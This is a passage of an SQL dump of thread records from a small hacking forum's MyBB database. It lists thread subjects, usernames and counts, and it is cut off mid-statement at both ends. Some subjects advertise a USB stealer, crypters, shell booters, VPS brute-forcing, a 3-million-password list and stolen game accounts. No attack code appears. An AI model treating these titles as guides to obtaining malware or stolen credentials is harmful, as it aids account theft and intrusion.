`lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('440', '74', '1300+ Runescape Accounts', '0', '0', '0', '82', 'iTzIpod', '1347712831', '2052', '1347712831', 'iTzIpod', '82', '5', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('441', '61', 'Adf.ly Bot + Adfoc.us Bot', '0', '0', '0', '82', 'iTzIpod', '1347712953', '2053', '1347985874', 't3h jok3r', '1', '21', '6', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('442', '42', 'Giant Solar Flare set to hit Earth in 2013', '0', '0', '0', '82', 'iTzIpod', '1347713327', '2054', '1347937476', 't3h jok3r', '1', '9', '5', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('443', '42', 'Apple Announces the iPhone 5', '0', '0', '0', '82', 'iTzIpod', '1347713405', '2055', '1349783025', 'mothered', '205', '47', '13', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('444', '61', '[eBook] How to get stuff on eBay for Free', '0', '0', '0', '82', 'iTzIpod', '1347713716', '2056', '1347713716', 'iTzIpod', '82', '2', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('445', '61', '[eBook] Adf.ly Money Making Machine', '0', '0', '0', '82', 'iTzIpod', '1347713946', '2057', '1347713946', 'iTzIpod', '82', '1', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('446', '28', 'This forum is dead..', '0', '0', '0', '82', 'iTzIpod', '1347716846', '2058', '1349553268', 'iTzIpod', '82', '84', '19', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('448', '61', 'Broken Links', '0', '0', '0', '82', 'iTzIpod', '1347720178', '2073', '1347741724', 'iTzIpod', '82', '11', '2', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('449', '35', 'Kratos God Of War Signature/Tag', '0', '0', '0', '82', 'iTzIpod', '1347720779', '2074', '1348888995', 'Apathy', '2', '26', '8', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('450', '20', 'Anyone got a good crypter?', '0', '0', '0', '5', 'Timmy', '1347749482', '2110', '1347778564', 'R?????zo?', '62', '6', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('451', '19', '[Junk][Junk][Recently Created]Free working shell booter', '0', '0', '0', '5', 'Timmy', '1347749580', '2111', '1349761011', 't3h jok3r', '1', '18', '4', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('464', '12', '[TUT] FUD USB Stealer by Anonymous Hackers', '0', '0', '0', '10', 'swa4567', '1347851698', '2192', '1348680507', 'Timmy', '5', '20', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('452', '29', '[EASY] ??How To Get $20+ Checks From Hershey\'s!??[eBook]', '0', '0', '0', '172', 'MistaCode', '1347792841', '2121', '1349304215', '??zg???g????61', '100', '26', '8', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('454', '35', 'L33THacking Logo attempt 2', '0', '0', '0', '172', 'MistaCode', '1347811140', '2139', '1349490556', 'Exposé', '222', '19', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('453', '19', '[Junk]Instagram Bot 3.2', '0', '0', '0', '82', 'iTzIpod', '1347800106', '2129', '1349127640', 'iTzIpod', '82', '3', '1', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('455', '29', 'CPA Twister 1.3 by sonex [FREE]', '0', '0', '0', '172', 'MistaCode', '1347812651', '2147', '1347812651', 'MistaCode', '172', '5', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('456', '29', 'Galaxian PPD Method v2 [Free]', '0', '0', '0', '172', 'MistaCode', '1347812738', '2148', '1347812738', 'MistaCode', '172', '6', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('457', '29', 'Get free Alienware Laptops [Secret Loophole of Dell Revealed](Limited Edition)', '0', '0', '0', '172', 'MistaCode', '1347812885', '2149', '1350802060', 'XxTREYZxX', '257', '33', '8', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('458', '29', 'How to get 26 months free of xbox live membership', '0', '0', '0', '172', 'MistaCode', '1347813005', '2150', '1347813005', 'MistaCode', '172', '6', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('459', '29', 'Affiliate Marketing [Price: 8$]', '0', '0', '0', '172', 'MistaCode', '1347813077', '2151', '1350802145', 'XxTREYZxX', '257', '10', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('461', '43', 'some PID\'s List', '0', '0', '0', '62', 'R?????zo?', '1347825758', '2171', '1347909980', 'iTzIpod', '82', '11', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('460', '34', 'R?????zo?\'s font pack, 1500+ [FREE]', '0', '0', '0', '62', 'R?????zo?', '1347817644', '2159', '1347825403', 'iTzIpod', '82', '12', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('462', '35', 'Vote for LHs new logo', '0', '0', '2', '1', 't3h jok3r', '1347848243', '2181', '1348108388', 'Slender Man', '194', '75', '16', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('463', '20', '[VB.NET]Free Encrypters Algothrims Codes AER256 - OKTO3 & MORE...', '0', '0', '0', '7', 'Romdu62', '1347849885', '2186', '1347849885', 'Romdu62', '7', '2', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('465', '11', 'What is ewhoring', '0', '0', '0', '10', 'swa4567', '1347851832', '2194', '1348275387', 'Timmy', '5', '32', '3', '0', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('466', '13', 'How to BruteForce a VPS!', '0', '0', '0', '5', 'Timmy', '1347853035', '2201', '1349233348', 'Timmy', '5', '24', '5', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('467', '44', 'Bestbuy PSD', '0', '0', '0', '5', 'Timmy', '1347853327', '2203', '1351917217', 'Timmy', '5', '14', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('468', '16', '[TUT] Free Dre Beats [Unconfirmed]', '0', '0', '0', '5', 'Timmy', '1347853534', '2204', '1347935799', 'Timmy', '5', '12', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('469', '3', '[Announcement]Going to clear up all the PMs on board', '0', '0', '0', '1', 't3h jok3r', '1347856289', '2210', '1347938745', 't3h jok3r', '1', '19', '6', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('470', '14', '[SHITLOAD][FRESH]Free proxy list', '0', '0', '0', '4', 'Triple H', '1347856939', '2211', '1347941431', 't3h jok3r', '1', '20', '7', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('471', '7', 'L33THackers is not L33THacking', '0', '0', '0', '1', 't3h jok3r', '1347857603', '2212', '1347910914', 'iTzIpod', '82', '9', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('473', '7', '1 Week within 1 Month', '0', '0', '0', '82', 'iTzIpod', '1347916175', '2252', '1347924039', 'iTzIpod', '82', '6', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('472', '7', 'School story', '0', '0', '0', '61', 'NXK', '1347892813', '2221', '1348106640', 'iTzIpod', '82', '55', '10', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('474', '25', 'What antivirus you have?', '0', '0', '0', '7', 'Romdu62', '1347936563', '2287', '1348617350', 'Romdu62', '7', '18', '8', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('475', '7', '500 posts', '0', '0', '0', '1', 't3h jok3r', '1348011635', '2318', '1348023834', 't3h jok3r', '1', '6', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('476', '19', '[Junk][Junk][Announcement] t3h jok3r might be inactive', '0', '0', '0', '82', 'iTzIpod', '1348015750', '2322', '1348018009', 't3h jok3r', '1', '4', '2', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('477', '19', '[Junk]Jok3r is going..', '0', '0', '0', '1', 't3h jok3r', '1348018219', '2325', '1348367868', 't3h jok3r', '1', '14', '1', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('478', '7', 'The Hunger Games', '0', '0', '0', '82', 'iTzIpod', '1348020369', '2328', '1348097453', 'iTzIpod', '82', '9', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('479', '49', '[Suggestion] Forum Logo resized', '0', '0', '0', '82', 'iTzIpod', '1348022509', '2329', '1349147323', 't3h jok3r', '1', '18', '6', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('480', '15', 'Windows 7 anytime upgrader keygen', '0', '0', '0', '2', 'Apathy', '1348025423', '2334', '1348025423', 'Apathy', '2', '6', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('481', '74', 'Runescape Accounts', '0', '0', '0', '82', 'iTzIpod', '1348085646', '2342', '1350113941', 'XxTREYZxX', '257', '14', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('482', '61', '3 Million Password List', '0', '0', '0', '82', 'iTzIpod', '1348085780', '2343', '1349052186', 'iTzIpod', '82', '6', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('483', '61', '[eBook] How to succeed in Adf.ly/Adfoc.us', '0', '0', '0', '82', 'iTzIpod', '1348086159', '2344', '1348086159', 'iTzIpod', '82', '2', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('484', '4', 'Slender Man here.', '0', '0', '0', '194', 'Slender Man', '1348093029', '2345', '1348497659', 'NXK', '61', '22', '5', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('485', '19', '[Junk][?] Switching Userbars?', '0', '0', '0', '82', 'iTzIpod', '1348104186', '2352', '1349127861', 'iTzIpod', '82', '13', '5', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('486', '56', 'Guess how many?', '0', '0', '0', '82', 'iTzIpod', '1348105597', '2353', '1350068512', 'GlowingCapes', '253', '16', '6', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('487', '56', 'Corrupt a wish', '0', '0', '0', '82', 'iTzIpod', '1348105845', '2354', '1352597674', 'iTzIpod', '82', '112', '40', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('488', '8', 'What are you listening to?', '0', '0', '0', '82', 'iTzIpod', '1348106004', '2355', '1349538068', 'Exposé', '222', '40', '15', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('489', '8', 'What are your favorite lyrics?', '0', '0', '0', '82', 'iTzIpod', '1348106137', '2356', '1348111389', 'Slender Man', '194', '6', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('490', '49', 'Forum Suggestion', '0', '0', '0', '194', 'Slender Man', '1348110073', '2381', '1349147246', 't3h jok3r', '1', '75', '20', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('491', '8', 'Free Album!', '0', '0', '0', '194', 'Slender Man', '1348111300', '2383', '1348140927', 'iTzIpod', '82', '7', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('492', '7', 'Where do you guys live? (BigPictures!!)', '0', '0', '0', '53', 'sirchamp', '1348145412', '2395', '1348241010', 'NXK', '61', '36', '9', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('493', '35', 'My Ugly Gamer Userbars', '0', '0', '0', '82', 'iTzIpod', '1348181350', '2405', '1348831916', 'iTzIpod', '82', '44', '13', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('494', '42', 'Chinese Man Has Lived on Water Alone for the Last 12 Years', '0', '0', '0', '82', 'iTzIpod', '1348181688', '2406', '1349729622', 'Hardz', '240', '52', '13', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('495', '61', 'Fresh Shells!', '0', '0', '0', '82', 'iTzIpod', '1348182692', '2407', '1348182692', 'iTzIpod', '82', '3', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('496', '14', 'Free Proxy List', '0', '0', '0', '82', 'iTzIpod', '1348183815', '2408', '1350595243', 'iTzIpod', '82', '69', '11', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO 